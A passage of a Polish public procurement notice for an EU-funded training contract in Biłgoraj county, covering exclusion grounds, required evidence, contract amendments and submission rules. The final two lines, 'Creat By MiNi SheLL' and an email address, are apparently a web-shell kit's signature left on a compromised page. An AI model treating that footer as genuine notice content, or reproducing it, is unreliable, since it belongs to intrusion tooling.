oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez<br/>zamawiającego. Wzór oświadczenia określa załącznik nr 8 do SWZ.&#34;<br/>DODATKOWE INFORMACJE DOT. PODSTAW WYKLUCZENIA Z POSTĘPOWANIA: Zgodnie z art. 7 ust. 1 ustawy z dnia 13<br/>kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022r. poz. 835 z późn. zm.) z postępowania o<br/>udzielenie<br/>zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września 2019 r. - Prawo zamówień<br/>publicznych wyklucza się:<br/>&#34;1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu<br/>269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 tej ustawy;<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o<br/>przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz.U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem<br/>rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 tej ustawy;<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września<br/>1994 r. o rachunkowości (Dz.U. z 2021 r. poz. 217, 2105 i 2106) jest podmiot wymieniony w wykazach określonych w rozporządzeniu<br/>765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile<br/>został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu<br/>środka, o którym mowa w art. 1 pkt 3 tej ustawy.&#34; (patrz pkt 7.1.2. SWZ).<br/>Zgodnie z pkt 8.1.2. SWZ: &#34;8.1.2 W oświadczeniu, o którym mowa w pkt. 8.1 SWZ Wykonawca potwierdza także brak podstaw do<br/>wykluczenia z udziału w postępowaniu o udzielenie zamówienia określonych w pkt 7.1.2 SWZ. Zamawiający zastrzega sobie<br/>możliwość samodzielnej weryfikacji braku zaistnienia podstaw wykluczenia danego wykonawcy określonych w pkt 7.1.2 SWZ za<br/>pomocą ogólnodostępnych baz danych, w szczególności wskazanych w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego.&#34;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie<br/>z pkt 8.4. SWZ: &#34;8.4. Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym<br/>terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych i oświadczeń (aktualnych na<br/>dzień złożenia): 8.4.1. W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1) W zakresie wskazanym w pkt 6.1.4 ppkt 1) SWZ Wykonawca zobowiązany będzie do złożenia wykazu usług wykonanych, w<br/>okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających, czy te<br/>usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów -<br/>oświadczenie wykonawcy. Wykaz należy przygotować według wzoru określonego w załączniku nr 6 do SWZ.<br/>2) W zakresie wskazanym w pkt 6.1.4 ppkt 2) SWZ Wykonawca zobowiązany będzie do złożenia wykazu osób, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na<br/>temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wykaz należy<br/>przygotować według wzoru określonego w załączniku nr 7 do SWZ.2. W przypadku, o którym mowa w pkt 6.3 i pkt 6.4 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy Pzp). Oświadczenie<br/>należy złożyć wg wymogów załącznika nr 5 do SWZ.<br/>3. Zgodnie z pkt 9.4. SWZ wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz<br/>z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów. Szczegółowe wymagania dotyczące podmiotowych środków dowodowych<br/>określa SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W rozdziale 13 SWZ zamawiający określił, iż oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) Formularz ofertowy – do wykorzystania wzór (druk), stanowiący Załącznik nr 2 do SWZ;<br/>2) Oświadczenie, o którym mowa w pkt 8.1 SWZ tj. o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu (Załącznik nr 3 do SWZ);<br/>3) Oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby<br/>(Załącznik nr 4 do SWZ) (jeżeli dotyczy);<br/>4) Oświadczenie, o którym mowa w pkt 8.3 SWZ tj. oświadczenie, z którego wynika, które usługi wykonają poszczególni<br/>wykonawcy (Załącznik nr 5 do SWZ) (jeżeli dotyczy);<br/>5) Zobowiązanie lub inne dokumenty, o których mowa w pkt 9.4 SWZ (jeżeli dotyczy).<br/>6) Potwierdzenie umocowania do działania w imieniu wykonawcy lub podmiotu udostępniającego zasoby:<br/>a) zamawiający w celu potwierdzenia, że osoba działająca w imieniu wykonawcy lub podmiotu udostępniającego zasoby jest<br/>umocowana do jego reprezentowania, żąda złożenia wraz z ofertą odpisu lub informacji z Krajowego Rejestru Sądowego,<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru;<br/>b) wykonawca lub podmiot udostępniający zasoby nie jest zobowiązany do złożenia dokumentów, o których mowa w lit a)<br/>jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane<br/>umożliwiające dostęp do tych dokumentów.<br/>c) jeżeli w imieniu wykonawcy lub podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w lit a), zamawiający żąda od wykonawcy lub podmiotu<br/>udostępniającego zasoby złożenia wraz z ofertą pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania wykonawcy.<br/>7) Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>(jeżeli dotyczy). Sposób i forma złożenia pełnomocnictwa została określona w pkt 13.7 SWZ.<br/>8) Opis programu szkolenia zgodnie ze wzorem stanowiącym Załącznik Nr 9 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego.<br/>2)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)Oświadczenie, o którym mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>b) W przypadku, o którym mowa w pkt 6.3 i pkt 6.4 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (art. 117 ust. 4 ustawy<br/>Pzp). Oświadczenie należy złożyć wg wymogów załącznika nr 5 do SWZ. Oświadczenie to jest podmiotowym środkiem<br/>dowodowym.<br/>c) Zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe i oświadczenia, o których mowa<br/>w pkt. 8.4 SWZ, przy czym podmiotowe środki dowodowe i oświadczenia, o których mowa:<br/>- w pkt. 8.4.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/ą spełnienie warunku udziału w<br/>postępowaniu,<br/>- w pkt. 8.4.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3) Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy na podstawie art. 454 – 455 ustawy Pzp<br/>oraz postanowień Projektu umowy. 2. Projekt umowy stanowi załącznik nr 10 do SWZ. 3. Zgodnie z §9 projektu umowy: ust.<br/>2 umowy: &#34;Strony dopuszczają wprowadzenie następujących zmian umowy zgodnie z art. 455 ust.1 pkt 1 ustawy Pzp:<br/>1)terminu wykonania zamówienia o czas niezbędny do jego prawidłowej realizacji – w przypadku niezrekrutowania grupy<br/>uczestników szkolenia z przyczyn niezależnych od Zamawiającego, np. braku osób zainteresowanych uczestnictwem w<br/>szkoleniu, rezygnacji osób zakwalifikowanych oraz z przyczyn uzasadnionych związanych z podejmowaniem działań<br/>związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem koronawirusa;<br/>2)harmonogramu szkolenia – w przypadku wystąpienia zdarzeń uniemożliwiających realizację dotychczasowego<br/>harmonogramu lub jego zmiany celem usprawnienia realizacji szkolenia. Zakres wprowadzanych zmian nie może być<br/>sprzeczny z opisem przedmiotu zamówienia;<br/>3)ceny - w przypadku niezrekrutowania całej grupy uczestników szkolenia, w szczególności braku osób zainteresowanych<br/>uczestnictwem w szkoleniu, rezygnacji osób zakwalifikowanych, wówczas wynagrodzenie Wykonawcy może zostać<br/>pomniejszone proporcjonalnie o liczbę osób niebiorących udziału w szkoleniu;<br/>4)numeru rachunku bankowego – w przypadku konieczności zmiany numeru rachunku bankowego na nowy rachunek<br/>bankowy;<br/>5)osób wykonujących zamówienie – w sytuacjach losowych w szczególności wskutek długotrwałej choroby lub innych<br/>zdarzeń losowych uniemożliwiających osobom wskazanym do realizacji zamówienia przeprowadzenia zajęć. W takim<br/>przypadku Wykonawca zobowiązany jest do przedstawienia Zamawiającemu w formie pisemnej, faksem lub drogą<br/>elektroniczną powodów uniemożliwiających osobom wskazanym do realizacji zamówienia wykonania usługi oraz informacji<br/>na temat doświadczenia nowych osób. Nowe osoby wykonujące zamówienie powinny posiadać co najmniej takie<br/>doświadczenie jak osoba wskazana w ofercie; zmiana może dotyczyć wszystkich osób wykonujących zamówienie;<br/>6) miejsca wykonania zamówienia – w przypadku wystąpienia w trakcie szkolenia zdarzeń losowych w szczególności<br/>powodzi, pożaru, awarii, usterek technicznych w miejscu odbywania szkolenia uniemożliwiających prowadzenie zajęć (w<br/>szczególności brak zasilania w energię elektryczną, awarie wodno-kanalizacyjne) pod warunkiem że warunki lokalowe<br/>zaproponowane przez Wykonawcę nie będą gorsze od warunków wskazanych w ofercie; zmiana może dotyczyć wszystkich<br/>miejsc i adresów zamówienia;<br/>7)materiałów szkoleniowych w przypadku braku możliwości zakupu wymaganej ilości podręczników, wstrzymania przez<br/>dane wydawnictwo druku pozycji książkowej wskazanej przez Wykonawcę pod warunkiem że nowe materiały przedłożone<br/>przez Wykonawcę nie będą gorsze pod względem jakości i treści merytorycznych od materiałów przedstawionych w ofercie<br/>a ich cena nie ulegnie zmianie; zmiana może dotyczyć wszystkich materiałów szkoleniowych;<br/>8)zasad i sposobu realizacji i wykonania zamówienia na skutek zmian wytycznych dotyczących realizacji projektów<br/>finansowanych ze środków EFS, zakres zmian nie może wykraczać poza zmiany tej umowy;<br/>9)zasad i sposobu realizacji i wykonania zamówienia na skutek zmian umowy o realizację projektu pn. „Aktywizacja osób<br/>młodych pozostających bez pracy<br/>w powiecie biłgorajskim (VI)” zawartej pomiędzy Powiatem Biłgorajskim a Województwem Lubelskim w zakresie<br/>umożliwiającym zapewnienie zgodności z wytycznymi, w tym:<br/>a)zasad przetwarzania danych osobowych,<br/>b)wypowiedzenia umowy w zw. z naruszeniem zasad przetwarzania danych osobowych.&#34;<br/>ust. 3 umowy: &#34;Zmiany mogą być wprowadzone na wniosek Zamawiającego lub Wykonawcy zgłoszony drugiej stronie przed<br/>wprowadzeniem zmian. Zmiany wymagają uprzedniego jej zaakceptowania przez strony umowy.&#34;<br/>ust. 4 umowy: &#34;Strony dopuszczają również zmiany umowy w przypadkach i na zasadach określonych w art.454 ust.2<br/>ustawy PZP innych niż wskazane w ust.2 umowy.&#34; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-14 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-14 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagania techn. i org. dot. korespondencji elektronicznej c.d. 1.Sposób sporządzania i przekazywania ofert, oświadczeń,<br/>o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych oraz innych informacji, oświadczeń lub<br/>dokumentów, przekazywanych w postępowaniu o udzielenie zamówienia publicznego określa Rozporządzenia Prezesa<br/>Rady Ministrów z dn. 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz.U. z 2020 poz. 2452). 2. Do kompresji dokumentów elektronicznych stosuje się co najmniej<br/>jeden z następujących formatów danych: .zip, .tar, .gz (.gzip), .7Z. Zamawiający dopuszcza również możliwość złożenia<br/>przez wykonawców dokumentów elektronicznych (w tym ofert) skompresowanych w formacie .RAR. 3. W przypadku gdy<br/>dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają<br/>informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dn. 16.04.1993r. o zwalczaniu<br/>nieuczciwej konkurencji (Dz.U. z 2022r. poz. 1233), wykonawca, w celu utrzymania w poufności tych inf., przekazuje je w<br/>wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący<br/>tajemnicę przedsiębiorstwa” a następnie wraz z plikami stanowiącymi jawną część należy ten plik zaszyfrować. (dot.<br/>składania ofert). SPOSÓB KOMUNIKOWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI (nie dot. składania ofert). 1.W<br/>postęp. o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w zakresie składania dokumentów,<br/>oświadczeń, wniosków (innych niż oferta) zawiadomień oraz przekazywanie inf. odbywa się elektronicznie za<br/>pośrednictwem:<br/>1)dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal lub<br/>2)poczty elektronicznej.<br/>2.W przypadku korzystania z rozwiązania określ. w ppkt 1) dokumenty elektroniczne składane są przez Wykonawcę za<br/>pośrednictwem „Formularza do komunikacji” jako załączniki. Korespondencja przesyłana za pośrednictwem tego formularza<br/>nie może być szyfrowana. We wszelkiej korespondencji zw. z niniejszym postępowaniem prowadzonej za pośrednictwem<br/>miniPortalu zamawiający i wykonawcy posługują się nr ogłoszenia BZP lub id. postęp. z miniPortalu (ID).<br/>3.Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej:<br/>1)wykonawca przekazuje dokumenty na adres poczty zamawiającego email: zamowienia@pupbilgoraj.pl: 2)zamawiający<br/>przekazuje dokumenty na adres poczty elektronicznej wskazany w formularzu ofertowym wykonawcy, na co wykonawca<br/>wyraża zgodę wskazując ten adres w ofercie i zobowiązuje się do utrzymania jego funkcjonalności przez czas trwania<br/>postęp. Domniemywa się, że dokumenty, oświadczenia i wnioski przekazane na adres poczty elektronicznej wskazany w<br/>formularzu ofertowym zostały doręczone skutecznie a wykonawca zapoznał się z ich treścią. Przekazanie wszelkich inf.<br/>poprzez pocztę elektroniczną wymaga na żądanie każdej ze stron niezwłocznego potwierdzenia faktu ich otrzymania. W<br/>komunikacji prowadzonej za pośrednictwem poczty elektronicznej Zamawiający dopuszcza posługiwanie się nr ref.<br/>postepowania określ. w pkt 1.1 SWZ.<br/>4.Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w SWZ oraz w:<br/>1)rozporządzeniu Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 poz. 2452) oraz<br/>2)rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23.12.2020r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 poz. 2415).

Creat By MiNi SheLL
Email: jattceo@gmail.com